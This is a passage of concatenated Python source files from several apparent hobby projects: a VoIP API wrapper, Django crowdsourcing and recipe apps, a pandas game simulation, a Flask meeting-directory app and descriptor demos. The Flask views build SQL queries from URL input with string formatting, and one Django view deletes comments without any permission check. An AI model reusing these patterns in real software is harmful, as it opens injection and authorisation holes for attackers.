return self._voipms_client._get(method, parameters)
```
#### File: voipms/entities/voicemailsend.py
```python
from voipms.baseapi import BaseApi
from voipms.helpers import validate_email
class VoicemailSend(BaseApi):
"""
Send for the Voicemail endpoint.
"""
def __init__(self, *args, **kwargs):
"""
Initialize the endpoint
"""
super(VoicemailSend, self).__init__(*args, **kwargs)
self.endpoint = 'voicemail'
def voicemail_email(self, mailbox, folder, message_num, email_address):
"""
Move Voicemail Message to a Destination Folder
:param mailbox: [Required] ID for a specific Mailbox (Example: 1001)
:type mailbox: :py:class:`int`
:param folder: [required] Name for specific Folder (Required if message id is passed, Example: 'INBOX', values from: voicemail.get_voicemail_folders)
:type folder: :py:class:`str`
:param message_num: [required] ID for specific Voicemail Message (Required if folder is passed, Example: 1)
:type message_num: :py:class:`int`
:param email_address: [required] Destination Email address (Example: <EMAIL>)
:type email_address: :py:class:`str`
:returns: :py:class:`dict`
"""
method = "sendVoicemailEmail"
if not isinstance(mailbox, int):
raise ValueError("ID for a specific Mailbox needs to be an int (Example: 1001)")
if not isinstance(folder, str):
raise ValueError("Name for specific Folder needs to be a str (Required if message id is passed, Example: 'INBOX', values from: voicemail.get_voicemail_folders)")
if not isinstance(message_num, int):
raise ValueError("ID for specific Voicemail Message needs to be an int (Required if folder is passed, Example: 1)")
if not isinstance(email_address, str):
raise ValueError("Destination Email address needs to be a str (Example: <EMAIL>@my-domain.com)")
elif not validate_email(email_address):
raise ValueError("Destination Email address is not a correct email syntax")
parameters = {
"mailbox": mailbox,
"folder": folder,
"message_num": message_num,
"email_address": email_address,
}
return self._voipms_client._get(method, parameters)
``` |
{
"source": "4dragunov/Crowd",
"score": 2
} |
#### File: CrowdEngine/challenge/forms.py
```python
from django import forms
from .models import Category, Challenge, Answer, Comment
from django.core.exceptions import ValidationError
from time import time
class AnswerForm(forms.ModelForm):
class Meta:
model = Answer
fields = ['title', 'body']
widgets = {
'title': forms.TextInput(attrs={'class': 'form-control'}),
'body': forms.Textarea(attrs={'class': 'form-control'}),
}
labels = {
"title": "Основная идея",
"body": "Подробное описание"
}
class CategoryForm(forms.ModelForm):
class Meta:
model = Category
fields = ['title', 'slug'] #'__all__'
widgets = {
'title' : forms.TextInput(attrs={'class' : 'form-control'}),
'slug' : forms.TextInput(attrs={'class': 'form-control'})
}
def clean_slug(self):
new_slug = self.cleaned_data['slug'].lower()
if new_slug == 'create':
raise ValidationError('Адрес не может быть "Create"')
if Category.objects.filter(slug__iexact=new_slug).count():
raise ValidationError('Адрес уже существует. Он должен быть уникальным. У нас есть адрес "{}"'.format(new_slug))
return new_slug
class ChallengeForm(forms.ModelForm):
class Meta:
model = Challenge
fields = ['title', 'body', 'categories', 'prize', 'date_remaining', 'image']
widgets = {
'title': forms.TextInput(attrs={'class': 'form-control'}),
#'slug': forms.TextInput(attrs={'class': 'form-control'}),
'body' : forms.Textarea(attrs={'class': 'form-control'}),
'categories': forms.SelectMultiple(attrs={'class': 'form-control'}),
'prize': forms.TextInput(attrs={'class': 'form-control'}),
'date_remaining': forms.SelectDateWidget(attrs={'class': 'form-control'}),
}
labels = {
"title": "Тема",
"body": "Текст",
"categories": "Категория проблемы",
'prize':"Призовой фонд",
'date_remaining':"Дата завершения",
}
def clean_slug(self):
new_slug = self.cleaned_data['slug'].lower()
if new_slug == 'create':
raise ValidationError('Адрес не может быть "Create"')
return new_slug
class CommentForm(forms.ModelForm):
class Meta:
model = Comment
fields = ("text",)
widgets = {
'text': forms.Textarea(),
}
labels = {
"text": "Текст"
}
```
#### File: CrowdEngine/challenge/models.py
```python
from django.db import models
from django.shortcuts import reverse, redirect
from django.utils.text import slugify
from django.contrib.auth import get_user_model
from django.contrib.contenttypes.fields import GenericRelation
from time import time
from django.utils import timezone
User = get_user_model()
def gen_slug(s):
new_slug = (slugify(s, allow_unicode=True))
return new_slug + '-' + str(int(time()))
class Challenge(models.Model):
title = models.CharField(max_length=150, db_index=True)
slug = models.SlugField(max_length=150, blank=True, unique=True)
body = models.TextField(blank=True, db_index=True)
date_pub = models.DateField(auto_now_add=True)
date_remaining = models.DateField(auto_now_add=False, blank=True, null=True)
prize = models.IntegerField(default=1000)
categories = models.ManyToManyField('Category', related_name='challenges')
challenge_author = models.ForeignKey(User, on_delete=models.CASCADE,
related_name="challenges", null=True)
image = models.ImageField(blank=True, upload_to='challenge/', null=True)
def __str__(self):
return self.title
def save(self, *args, **kwargs):
if not self.id:
self.slug = gen_slug(self.title)
super().save(*args, **kwargs)
def days_remaning(self):
days_remaning = self.date_remaining - self.date_pub
return days_remaning.days
def get_absolute_url(self):
return reverse('challenge_detail_url', kwargs={'slug': self.slug})
def get_update_url(self):
return reverse('challenge_update_url', kwargs={'slug':self.slug})
def get_delete_url(self):
return reverse('challenge_delete_url', kwargs={'slug': self.slug})
class Answer(models.Model):
challenge = models.ForeignKey(Challenge, on_delete=models.SET_NULL, related_name='answers', null=True)
title = models.CharField(max_length=150, db_index=True)
#slug = models.ForeignKey(Challenge.slug, on_delete=models.SET_NULL, related_name='challenge_slug', null=True)
body = models.TextField(blank=True)
date_pub = models.DateField(auto_now_add=True)
author = models.ForeignKey(User, on_delete=models.CASCADE,
related_name="answers", null=True)
# answer_like = models.ManyToManyField(User, related_name='answer_liked', blank=True)
# answer_dislike = models.ManyToManyField(User, related_name='answer_disliked', blank=True)
def __str__(self):
return self.title
# def get_absolute_url(self):
# return reverse("blog_detail", args=[str(self.pk)])
def get_absolute_url(self):
return reverse('answer_detail_url', kwargs={'slug':
self.challenge.slug,
'pk': self.pk})
def get_answer_list(self):
return reverse('answers_list_url', kwargs={'slug': self.challenge.slug})
class AnswerLike(models.Model):
user = models.ForeignKey(User, on_delete=models.CASCADE,
related_name="user_liked")
answer = models.ForeignKey(Answer, on_delete=models.CASCADE,
related_name="likes")
challenge = models.ForeignKey(Challenge, on_delete=models.CASCADE,
related_name='challenge', null=True, blank=True)
def __str__(self):
return self.user.username
class Category(models.Model):
title = models.CharField(max_length=50)
slug = models.SlugField(max_length=50, unique=True)
def __str__(self):
return self.title
def get_absolute_url(self):
return reverse('category_detail_url', kwargs={'slug': self.slug})
def get_update_url(self):
return reverse('category_update_url', kwargs={'slug': self.slug})
def get_delete_url(self):
return reverse('category_delete_url', kwargs={'slug': self.slug})
class Comment(models.Model):
answer = models.ForeignKey(Answer, on_delete=models.CASCADE,
related_name='comments', null=True)
author = models.ForeignKey(User, on_delete=models.CASCADE,
related_name="comments", null=True)
text = models.TextField()
created = models.DateTimeField(auto_now_add=True)
# unique_together = ["post", "author"]
```
#### File: CrowdEngine/challenge/views.py
```python
from django.shortcuts import render, redirect, get_object_or_404, HttpResponse
from .models import Challenge, Category, Answer, AnswerLike, Comment
from django.views.generic import View
from .forms import CategoryForm, ChallengeForm, AnswerForm, CommentForm
from .utils import ObjectDetailMixin, ObjectUpdateMixin, ObjectDeleteMixin
from django.contrib.auth.decorators import login_required
from django.urls import reverse
from django.contrib.auth.mixins import LoginRequiredMixin
from django.db.models import Count
from django.contrib.auth import get_user_model
from django.core.paginator import Paginator
from django.utils import timezone
User = get_user_model()
class AnswerCreate(View):
def get(self, request, slug):
challenge = Challenge.objects.get(slug__iexact=slug)
form = AnswerForm()
return render(request, 'challenge/answer_create.html', context={'form': form,
'challenge':challenge})
def post(self, request, slug):
challenge = Challenge.objects.get(slug__iexact=slug)
form = AnswerForm(request.POST)
if form.is_valid():
new_answer = form.save(commit=False)
new_answer.author = request.user
new_answer.challenge = challenge
new_answer.save()
return redirect('answers_list_url', challenge.slug)
return render(request, 'challenge/answer_create.html', context={'form': form,
'challenge':challenge})
def answerEdit(request, slug, pk):
is_form_edit = True
answer = get_object_or_404(Answer, challenge__slug=slug,
pk__iexact=pk)
challenge = get_object_or_404(Challenge, slug__iexact=slug)
if answer.author == request.user:
form = AnswerForm(request.POST or None,
files=request.FILES or None, instance=answer)
if form.is_valid():
post = form.save()
return redirect('answer_detail_url', slug, pk)
form = AnswerForm(instance=answer)
return render(request, "challenge/answer_create.html",
context={'form': form,
"is_form_edit": is_form_edit,
'challenge': challenge})
else:
return redirect('main_url')
def answers_list(request, slug):
top_categories = Category.objects.all().annotate(cnt=Count('challenges')).order_by('-cnt')[:4]
top_challenges = Challenge.objects.order_by("answers")[:3]
challenge = get_object_or_404(Challenge,slug__iexact=slug)
answers = Answer.objects.filter(challenge__slug=slug).annotate(cnt=(
Count('likes'))).order_by('-cnt')
paginator = Paginator(answers,
4) # показывать по 10 записей на странице.
page_number = request.GET.get(
'page') # переменная в URL с номером запрошенной страницы
page = paginator.get_page(
page_number) # получить записи с нужным смещением
return render(request, 'challenge/answers_list.html',
context={'answers': answers,
'top_categories':top_categories,
'top_challenges':top_challenges,
'challenge':challenge,
'page':page,
'paginator':paginator})
def add_comment(request, slug, pk):
answer = get_object_or_404(Answer, pk=pk)
form = CommentForm(request.POST or None)
if form.is_valid():
new_comment = form.save(commit=False)
form.instance.author = request.user
form.instance.answer = answer
new_comment.save()
return redirect('answer_detail_url', slug, pk)
return render(request, "challenge/answer_detail.html", context={"form": form})
def del_comment(request, slug, pk, pk_comment):
answer = get_object_or_404(Answer, pk=pk)
comment = answer.comments.filter(pk=pk_comment)
comment.delete()
return redirect('answer_detail_url', slug, pk)
@login_required
def answerAddLike(request, slug, pk, url):
answer = get_object_or_404(Answer, pk=pk)
challenge = get_object_or_404(Challenge, slug__iexact=slug)
AnswerLike.objects.get_or_create(user=request.user, answer=answer,
challenge=challenge)
return redirect(url, slug=slug)
@login_required
def answerDelLike(request, slug, pk, url):
answer = get_object_or_404(Answer, pk=pk)
challenge = get_object_or_404(Challenge, slug__iexact=slug)
answer_like = AnswerLike.objects.get(user=request.user, answer=answer, challenge=challenge)
answer_like.delete()
return redirect(url, slug=slug)
def challenges_list(request):
user = request.user
challenges = Challenge.objects.all().order_by('-date_pub')
paginator = Paginator(challenges,
4) # показывать по 10 записей на странице.
page_number = request.GET.get(
'page') # переменная в URL с номером запрошенной страницы
page = paginator.get_page(
page_number) # получить записи с нужным смещением
top_challenges = Challenge.objects.order_by("answers")[:3]
#top_categories = Challenge.objects.all().annotate(cnt=Count('categories'))
top_categories = Category.objects.all().annotate(cnt=Count('challenges')).order_by('-cnt')[:4]
date = timezone.now().date()
return render(request, 'challenge/challenge_list.html',
context={'challenges': challenges,
'top_challenges' : top_challenges,
'top_categories' : top_categories,
'page': page, 'paginator': paginator,
'date':date,
'user':user
})
def challenge_detail(request, slug):
challenge = get_object_or_404(Challenge, slug__iexact=slug)
top_challenges = Challenge.objects.order_by("answers")[:3]
answers = Answer.objects.filter(challenge__slug=slug).annotate(cnt=(
Count('likes'))).order_by('-cnt')[:3]
top_categories = Category.objects.all().annotate(cnt=Count('challenges')).order_by('-cnt')[:4]
return render(request, 'challenge/challenge_detail.html',
context={'challenge': challenge,
'top_challenges' : top_challenges,
'top_categories' : top_categories,
'answers': answers,
})
def answer_detail(request, slug, pk):
answer = get_object_or_404(Answer, pk=pk)
challenge = get_object_or_404(Challenge, slug__iexact=slug)
top_challenges = Challenge.objects.order_by("answers")[:2]
top_categories = Category.objects.all().annotate(cnt=Count(
'challenges')).order_by('-cnt')[:3]
form = CommentForm()
items = answer.comments.all().order_by("-created")
return render(request, 'challenge/answer_detail.html',
context={'answer':answer,
'challenge':challenge,
'top_challenges': top_challenges,
'top_categories': top_categories,
'form':form,
'items':items
})
def categories_list(request):
categories = Category.objects.all().annotate(cnt=Count(
'challenges')).order_by('-cnt')
top_challenges = Challenge.objects.order_by("answers")[:3]
# top_categories = Challenge.objects.all().annotate(cnt=Count('categories'))
top_categories = Category.objects.all().annotate(cnt=Count('challenges')).order_by('-cnt')[:4]
return render(request, 'challenge/categories_list.html',
context={'categories': categories,
'top_challenges': top_challenges,
'top_categories': top_categories,
})
def categoryDetail(request, slug):
category = get_object_or_404(Category, slug__iexact=slug)
challenges = category.challenges.all()
paginator = Paginator(challenges,
4) # показывать по 10 записей на странице.
page_number = request.GET.get(
'page') # переменная в URL с номером запрошенной страницы
page = paginator.get_page(
page_number) # получить записи с нужным смещением
top_challenges = Challenge.objects.order_by("answers")[:3]
# top_categories = Challenge.objects.all().annotate(cnt=Count('categories'))
top_categories = Category.objects.all().annotate(
cnt=Count('challenges')).order_by('-cnt')[:4]
return render(request, 'challenge/categories_detail.html',
context={'top_challenges': top_challenges,
'top_categories': top_categories,
'page': page, 'paginator': paginator,
'category':category})
class CategoryDetail(ObjectDetailMixin, View):
model = Category
template = 'challenge/categories_detail.html'
class CategoryCreate(View):
def get(self, request):
form = CategoryForm()
return render(request, 'challenge/category_create.html', context={'form' : form})
def post(self,request):
bound_form = CategoryForm(request.POST)
if bound_form.is_valid():
new_category = bound_form.save()
return redirect(new_category)
return render(request, 'challenge/category_create.html', context={'form' : bound_form})
class ChallengeCreate(View):
def get(self, request):
form = ChallengeForm()
return render(request, 'challenge/challenge_create.html', context={'form' : form})
def post(self,request):
bound_form = ChallengeForm(request.POST)
if bound_form.is_valid():
new_challenge = bound_form.save(commit=False)
bound_form.instance.challenge_author = request.user
new_challenge.save()
return redirect(new_challenge)
return render(request, 'challenge/challenge_create.html', context={'form': bound_form})
class ChallengeUpdate(ObjectUpdateMixin, View):
model = Challenge
model_form = ChallengeForm
template = 'challenge/challenge_update_form.html'
class CategoryUpdate(ObjectUpdateMixin, View):
model = Category
model_form = CategoryForm
template = 'challenge/category_update_form.html'
class CategoryDelete(ObjectDeleteMixin, View):
model = Category
template = 'challenge/category_delete_form.html'
redirect_url = 'categories_list_url'
class ChallengeDelete(ObjectDeleteMixin, View):
model = Challenge
template = 'challenge/challenge_delete_form.html'
redirect_url = 'challenges_list_url'
# def get(self, request, slug):
# category = Category.objects.get(slug__iexact=slug)
# bound_form = CategoryForm(instance=category)
# return render(request, 'challenge/category_update_form.html', context={'form': bound_form, 'category' : category})
#
# def post(self, request, slug):
# category = Category.objects.get(slug__iexact=slug)
# bound_form = CategoryForm(request.POST,instance=category)
#
# if bound_form.is_valid():
# new_category = bound_form.save()
# return redirect(new_category)
# return render(request, 'challenge/category_update_form.html', context={'form': bound_form, 'category' : category})
```
#### File: CrowdEngine/CrowdEngine/views.py
```python
from django.shortcuts import redirect, render
from challenge.models import Challenge, Answer, User
from django.db.models import Avg, Max, Min, Sum
from django.contrib.auth import get_user_model
from django.contrib.auth.models import User
from django.db.models import Count
from django.shortcuts import render, redirect, get_object_or_404, HttpResponse
User = get_user_model()
def redirect_crowd(request):
data = 123
challenge_count = Challenge.objects.all().count()
answers_count = Answer.objects.all().count()
#users_count = User.count()
# users_count = Challenge.objects.filter(au).count()
total_users = User.objects.aggregate(total_users=Count('id'))['total_users'],
challenge_users = Challenge.objects.all().aggregate(challenge_users = Count('challenge_author'))['challenge_users'],
answer_users = Answer.objects.all().aggregate(answer_users = Count('author'))['answer_users'],
prize_amount = Challenge.objects.all().aggregate(prize_amount = Sum('prize'))['prize_amount']
#
return render(request, 'main.html', context={'data': data, 'challenge_count' : challenge_count,
'answers_count' : answers_count, 'prize_amount':prize_amount,
'total_users': total_users, 'challenge_users' :challenge_users})
def about_us(request):
data = 123
return render(request, "about.html")
``` |
{
"source": "4dragunov/foodgram-project",
"score": 2
} |
#### File: recipes/templatetags/recipe_filters.py
```python
from django import template
from recipes.models import Favorite, Purchase, Subscription
register = template.Library()
@register.filter
def check_subscribe(author, user):
'''Проверка наличия подписки пользователя на автора рецепта'''
return Subscription.objects.filter(author_id=author.id,
user_id=user.id).exists()
@register.filter
def check_favorite(recipe, user):
'''Проверка наличия рецепта в избранном у пользователя'''
return Favorite.objects.filter(recipe_id=recipe.id,
user_id=user.id).exists()
@register.filter
def check_purchase(recipe, user):
'''Проверка наличия рецепта в избранном у пользователя'''
return Purchase.objects.filter(recipe_id=recipe.id,
user_id=user.id).exists()
@register.filter(name='count_purchase')
def count_purchase(user):
'''Подсчет количества рецептов в списке покупок'''
return Purchase.objects.filter(user_id=user.id).count()
``` |
{
"source": "4dragunov/yamdb_final",
"score": 2
} |
#### File: yamdb_final/titles/models.py
```python
import datetime
from django.core.validators import MaxValueValidator, MinValueValidator
from django.db import models
class Category(models.Model):
name = models.CharField(
max_length=100,
verbose_name='Название категории',
)
slug = models.SlugField(
max_length=40,
unique=True,
)
def __str__(self):
return self.slug
class Meta:
ordering = (
'-name',
)
class Genre(models.Model):
name = models.CharField(
max_length=100,
verbose_name='Название жанра',
blank=False,
)
slug = models.SlugField(
max_length=40,
unique=True,
)
def __str__(self):
return self.slug
class Meta:
ordering = (
'-name',
)
class Title(models.Model):
name = models.CharField(
max_length=100,
verbose_name='Название произведения',
)
year = models.PositiveIntegerField(
default=datetime.datetime.now().year,
)
rating = models.PositiveSmallIntegerField(
validators=[
MaxValueValidator(10, 'Рейтинг не может быть выше 10'),
MinValueValidator(1),
],
null=True,
verbose_name="Рейтинг",
)
description = models.TextField(
max_length=1000,
verbose_name='Краткое описание',
)
genre = models.ManyToManyField(Genre)
category = models.ForeignKey(
Category,
null=True,
on_delete=models.SET_NULL,
related_name='titles',
verbose_name='Категория',
)
slug = models.SlugField(max_length=40)
class Meta:
ordering = (
'-rating',
)
``` |
{
"source": "4dsolutions/CSN",
"score": 4
} |
#### File: 4dsolutions/CSN/context1.py
```python
import sqlite3 as sql
class DB:
def __init__(self, the_db):
self.dbname = the_db
def __enter__(self):
"""
connect and get conn, curs
"""
self.conn = sql.connect(self.dbname)
self.curs = self.conn.cursor()
return self # this very object is db
def __exit__(self, *oops):
if self.conn:
self.conn.close()
if oops[0]: # exception occurred, else None
return False # not handling it...
return True # nothing to handle
# we'll want to import DB without triggering this test:
if __name__ == "__main__":
with DB("users.db") as db:
# connected...
db.curs.execute("SELECT * FROM Users ORDER BY username")
for row in db.curs.fetchall():
print(row)
# disconnected
```
#### File: 4dsolutions/CSN/csn0.py
```python
import numpy as np
import pandas as pd
import json
import hashlib
import random
#%%
# Create data section
def shazam(the_str):
return hashlib.sha256(bytes(the_str, encoding='utf-8')).hexdigest()[:10]
def data():
global hall_of_fame
games = {"games":[
{"gcode": "ASM",
"name": "Awesome Journey",
"rating": "hard",
"audience": "teen",
"theme": "theme park"},
{"gcode": "TSH",
"name": "Treasure Hunt",
"rating": "hard",
"audience": "teen",
"theme": "VR"},
{"gcode": "PPS",
"name": "<NAME>",
"rating": "easy",
"audience": "all",
"theme": "epic"},
{"gcode": "WRR",
"name": "<NAME>",
"rating": "medium",
"audience": "adult",
"theme": "quiz"}
]}
# WARNING: destructive output, existing data will be overwritten
with open("games.json", 'w') as outfile:
json.dump(games, outfile)
players = {"players":[
{'pcode':shazam('Gus'),
'name': 'Gus',
'aliases': ['gustav', 'gus', 'the guster'],
'profile' : 'id-12345',
'account' : 200},
{'pcode':shazam('Keela'),
'name': 'Keela',
'aliases': ['keesha', 'pandabear', 'sloth'],
'profile' : 'id-54932',
'account' : 150},
{'pcode':shazam('Tor'),
'name': 'Tor',
'aliases': ['torror', 'torus', 'the tor'],
'profile' : 'id-94031',
'account' : 200},
{'pcode':shazam('Mitsu'),
'name': 'Mitsu',
'aliases': ['bishi', 'sitcom', 'vagrant'],
'profile' : 'id-88493',
'account' : 100}
]
}
# WARNING: destructive output, existing data will be overwritten
with open("players.json", 'w') as outfile:
json.dump(players, outfile)
causes = {"causes":[
{'zcode': 'STB',
'name':'Save the Bees'},
{'zcode': 'STW',
'name':'Save the Whales'},
{'zcode': 'STS',
'name':'Save the Seas'}
]}
# WARNING: destructive output, existing data will be overwritten
with open("causes.json", 'w') as outfile:
json.dump(causes, outfile)
# DataFrames
hall_of_fame = pd.DataFrame({"pcode": pd.Series([], dtype=pd.np.unicode_),
"gcode": pd.Series([], dtype=pd.np.unicode_),
"zcode": pd.Series([], dtype=pd.np.unicode_),
"amnt" : pd.Series([], dtype=pd.np.int32),
"timestamp": pd.Series([], dtype='datetime64[ns]')})
#%%
def make_players():
pcode = np.array([], dtype=np.unicode)
name = np.array([], dtype=np.unicode)
aliases = np.array([], dtype=np.unicode)
profile = np.array([], dtype=np.unicode)
account = np.array([], dtype=np.int32)
with open('players.json') as target:
players = json.load(target)
for record in players['players']:
pcode = np.append(pcode, record['pcode'])
name = np.append(name, record['name'])
aliases = np.append(aliases, ", ".join(record['aliases']))
profile = np.append(profile, record['profile'])
account = np.append(account, record['account'])
return pd.DataFrame({'pcode' : pcode,
'name' : name,
'aliases': aliases,
'profile': profile,
'account': account})
def make_causes():
zcode = np.array([], dtype=np.unicode)
name = np.array([], dtype=np.unicode)
with open('causes.json') as target:
causes = json.load(target)
for record in causes['causes']:
zcode = np.append(zcode, record['zcode'])
name = np.append(name, record['name'])
return pd.DataFrame({'zcode': zcode,
'name': name})
def make_games():
gcode = np.array([], dtype=np.unicode)
name = np.array([], dtype=np.unicode)
rating = np.array([], dtype=np.unicode)
audience = np.array([], dtype=np.unicode)
theme = np.array([], dtype=np.unicode)
with open('games.json') as target:
games = json.load(target)
for record in games['games']:
gcode = np.append(gcode, record['gcode'])
name = np.append(name, record['name'])
rating = np.append(rating, record['rating'])
audience= np.append(audience, record['audience'])
theme = np.append(theme, record['theme'])
#print(gcode)
#print(name)
#print(rating)
#print(audience)
#print(theme)
return pd.DataFrame({'gcode' : gcode,
'name' : name,
'rating' : rating,
'audience': audience,
'theme' : theme})
class Cause:
def __init__(self, **kwargs):
self.name = kwargs['name']
self.zcode = kwargs['zcode']
class Shop:
def __init__(self):
pass
def play(self, the_player, prompting=False, **kwargs):
the_game = None
print("\nGreetings {}".format(the_player.name))
if prompting:
self.print_games()
the_game = input("What game (enter code)...? ")
the_commit = int(input("Commit how much? (1-10) "))
else:
the_game = kwargs['the_game']
the_commit = kwargs['the_commit']
if not the_game:
print("No game selected")
return None
the_player.the_game = load_game(gcode=the_game)
the_player.commit = the_commit
print(the_player.the_game)
print("Thank you for playing {}".format(the_player.the_game.name))
the_player.account -= the_player.commit
# OK, we're playing now...
print("Action action, bling bling...")
win = random.randint(0,10)/100 * the_player.commit + \
the_player.commit
return win
def commit(self, the_player, prompting=False, **kwargs):
the_cause = None
if prompting:
self.print_causes()
the_cause = input("You win! Commit {} to... ?".
format(the_player.winnings))
else:
the_cause = kwargs['the_cause']
if not the_cause:
print("No cause selected")
return None
the_player.the_cause = load_cause(zcode = the_cause)
self.commit_winnings(the_player)
the_player.update_profile()
def commit_winnings(self, the_player):
print("{} gets {}".format(the_player.the_cause.name,
the_player.winnings))
def print_causes(self):
print(causes)
def print_games(self):
print(games)
class Game:
def __init__(self, **kwargs):
self.name = kwargs['name']
self.gcode = kwargs['gcode']
self.rating = kwargs['rating']
self.audience = kwargs['audience']
self.theme = kwargs['theme']
def __repr__(self):
return "Game: {}, code: {}".format(self.name, self.gcode)
class Player:
def __init__(self, pcode, nm, alias, profile, acct):
self.pcode = pcode # face recognition? Welcome Real Player One
self.name = nm
self.alias = alias
self.profile = profile
self.account = acct
# decided during play
self.commit = 0
self.winnings = 0
self.the_game = None
self.the_cause = None
def play(self, the_shop, prompting=False, **kwargs):
# play a game, donate winnings to the cause
self.winnings = the_shop.play(self, prompting, **kwargs)
the_shop.commit(self, prompting, **kwargs)
def update_profile(self):
"""
Columns: [pcode, gcode, zcode, amnt, timestamp]
"""
global hall_of_fame, new_rec
# the_player.update_profile(the_cause, the_game, amount, table=None)
print("{} gives {} to {}".format(self.name,
self.winnings,
self.the_cause.name))
new_rec = pd.DataFrame(
[[self.pcode, self.the_game.gcode, self.the_cause.zcode,
self.winnings, pd.datetime.now()]],
columns=['pcode', 'gcode', 'zcode', 'amnt', 'timestamp'])
hall_of_fame = hall_of_fame.append(new_rec)
hall_of_fame.index = pd.RangeIndex(0, hall_of_fame.shape[0])
def load_player(name=None, pcode=None):
if name:
the_player = players.query('name == "{}"'.format(name))
if pcode:
the_player = players.query('pcode == "{}"'.format(pcode))
pcode = the_player.pcode.values[0]
name = the_player.name.values[0]
aliases = the_player.aliases.values[0]
profile = the_player.profile.values[0]
acct = the_player.account.values[0]
return Player(pcode, name, aliases, profile, acct)
def load_game(name=None, gcode=None):
if name:
the_game = games.query('name == "{}"'.format(name))
if gcode:
the_game = games.query('gcode == "{}"'.format(gcode))
gcode = the_game.gcode.values[0]
name = the_game.name.values[0]
rating = the_game.rating.values[0]
audience= the_game.audience.values[0]
theme = the_game.theme.values[0]
# all named arguments **kwargs
return Game(gcode = gcode,
name = name,
rating = rating,
audience = audience,
theme = theme)
def load_cause(zcode=None, name=None):
if name:
the_cause = causes.query('name == "{}"'.format(name))
if zcode:
the_cause = causes.query('zcode == "{}"'.format(zcode))
zcode = the_cause.zcode.values[0]
name = the_cause.name.values[0]
# all named arguments **kwargs
return Cause(zcode = zcode,
name = name)
def simulation1():
the_shop = Shop()
the_player = load_player(name = "Gus")
the_player.play(the_shop, prompting=True)
the_player = load_player(name = "Keela")
the_player.play(the_shop, prompting=True)
def simulation2():
the_shop = Shop()
the_player = load_player(name = "Gus")
the_player.play(the_shop, prompting=False,
the_game="ASM",
the_cause='STB',
the_commit = 5)
the_player = load_player(name = "Keela")
the_player.play(the_shop, prompting=False,
the_game = 'TSH',
the_cause = 'STW',
the_commit = 9)
if __name__ == "__main__":
data()
causes = make_causes()
players = make_players()
games = make_games()
# simulation1()
simulation2()
``` |
{
"source": "4dsolutions/NPYM",
"score": 2
} |
#### File: 4dsolutions/NPYM/npym_flask_app.py
```python
from flask import Flask, request, render_template
import sqlite3 as sql
import os
import time
import datetime
target_path = '/home/thekirbster/NPYM'
db_name = os.path.join(target_path, 'npym.db')
app = Flask(__name__)
@app.route("/")
def index():
user_agent = request.headers.get('User-Agent')
localtime = time.ctime(time.mktime(time.localtime()))
gmt_time = time.ctime(time.mktime(time.gmtime()))
return render_template('index.html', agent = user_agent,
local = localtime,
gmt = gmt_time)
@app.route("/slate/npym")
def npym_slate():
user_agent = request.headers.get('User-Agent')
localtime = time.ctime(time.mktime(time.localtime()))
gmt_time = time.ctime(time.mktime(time.gmtime()))
conn = sql.connect(db_name)
c = conn.cursor()
c.execute("""SELECT sl.group_name, sl.role_name, sl.friend_name,
ma.mtg_name, sl.start_date, sl.stop_date
FROM slates AS sl, member_attender AS ma
WHERE sl.friend_id = ma.friend_id
AND ({} BETWEEN sl.start_date AND sl.stop_date)
AND sl.mtg_code = 'npym'
ORDER BY sl.group_name""".format(datetime.date.today().toordinal()))
recs = list(c.fetchall())
conn.close()
def converter(unixepoch):
return datetime.date.fromordinal(unixepoch).isoformat()
return render_template('npym_slate.html', recs = recs, agent = user_agent,
local = localtime,
gmt = gmt_time, converter = converter)
@app.route('/slate/<mtg_code>')
def meeting_slate(mtg_code):
user_agent = request.headers.get('User-Agent')
localtime = time.ctime(time.mktime(time.localtime()))
gmt_time = time.ctime(time.mktime(time.gmtime()))
conn = sql.connect(db_name)
c = conn.cursor()
c.execute("""SELECT * FROM slates AS sl
WHERE ({} BETWEEN sl.start_date AND sl.stop_date)
AND sl.mtg_code = '{}'
ORDER BY sl.group_name""".format(datetime.date.today().toordinal(),
mtg_code))
recs = list(c.fetchall())
conn.close()
def converter(unixepoch):
return datetime.date.fromordinal(unixepoch).isoformat()
return render_template('slate.html', recs = recs, agent = user_agent,
local = localtime,
gmt = gmt_time, converter = converter)
@app.route('/friends/<mtg_code>')
def friends(mtg_code):
user_agent = request.headers.get('User-Agent')
localtime = time.ctime(time.mktime(time.localtime()))
gmt_time = time.ctime(time.mktime(time.gmtime()))
conn = sql.connect(db_name)
c = conn.cursor()
c.execute("""SELECT * FROM member_attender ma
WHERE ma.mtg_code = '{}'
ORDER BY ma.friend_name""".format(mtg_code))
today = datetime.date.today().toordinal()
recs = [rec for rec in c.fetchall()
if ((rec[5] == None) or (not today > rec[5]))]
conn.close()
return render_template('friends.html', recs = recs, agent = user_agent,
local = localtime,
gmt = gmt_time)
@app.route('/meetings/')
def meetings():
user_agent = request.headers.get('User-Agent')
localtime = time.ctime(time.mktime(time.localtime()))
gmt_time = time.ctime(time.mktime(time.gmtime()))
conn = sql.connect(db_name)
c = conn.cursor()
c.execute("""SELECT mtg_quarter, mtg_type, mtg_name, mtg_code FROM Meetings
ORDER BY mtg_quarter, mtg_type, mtg_name""")
recs = list(c.fetchall())
conn.close()
return render_template('meetings.html', recs = recs, agent = user_agent,
local = localtime,
gmt = gmt_time)
if __name__ == "__main__":
app.run(debug=True)
``` |
{
"source": "4dsolutions/Python5",
"score": 4
} |
#### File: 4dsolutions/Python5/dogma.py
```python
class Nondata:
def __init__(self, f):
if type(f) == str:
self.attr = f
else:
self.attr = f.__name__
def __get__(self, obj, cls):
print("in __get__", obj, cls)
return 42
class Data:
def __init__(self, f):
if type(f) == str:
self.attr = f
else:
self.attr = f.__name__
def __set__(self, obj, value):
print("in __set__", obj, value)
obj.__dict__[self.attr] = value
def __get__(self, obj, cls):
print("in __get__", obj, cls)
if self.attr in obj.__dict__:
return obj.__dict__[self.attr]
class Creature:
color = Data("color") # override
age = Nondata("age")
class Dog(Creature):
# color = "Green"
def __init__(self, nm):
self.name = nm
self.color = "brown" # triggers __get__
self.age = 10 # stores to self.__dict__
class Cat:
def __init__(self, nm):
self.name = nm
@Data
def color(self, color):
pass
@Nondata
def age(self, age):
self.age = age
```
#### File: 4dsolutions/Python5/page_turner.py
```python
from math import sqrt
from tetravolume import Tetrahedron
sqrt2 = sqrt(2)
def coverA(n):
# Cover A to Tip when Tetrahedron volume = sqrt(n/9)
acute = sqrt(6-(2*(sqrt(9-n))))
return acute
def coverB(n):
# Cover B to Tip when Tetrahedron volume = sqrt(n/9)
obtuse = sqrt(6+(2*(sqrt(9-n))))
return obtuse
def chart():
"""
>>> chart()
Vol. IVM XYZ check
√(0/9) 0.000000 0.000000 0.000000
